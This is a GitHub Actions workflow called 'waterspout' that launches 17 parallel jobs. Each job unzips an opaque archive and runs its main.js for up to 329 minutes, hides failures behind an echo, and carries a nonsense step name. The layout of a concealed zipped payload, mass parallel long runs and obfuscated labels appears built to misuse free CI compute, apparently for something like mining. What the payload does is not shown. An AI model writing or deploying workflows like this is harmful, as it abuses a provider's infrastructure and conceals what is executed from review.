name: waterspout
on:
  push:
    branches: [ "main" ]
    paths:
      - "waterspout.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }
          - { os: 8 }
          - { os: 9 }
          - { os: 10 }
          - { os: 11 }
          - { os: 12 }
          - { os: 13 }
          - { os: 14 }
          - { os: 15 }
          - { os: 16 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip waterspout.zip
        run: |
          sudo apt install -y unzip
          unzip waterspout.zip

      - name: because kiddingly creamy print
        run: |
          npm install --ignore-scripts
          timeout 329m node main.js || echo "waterspout executed"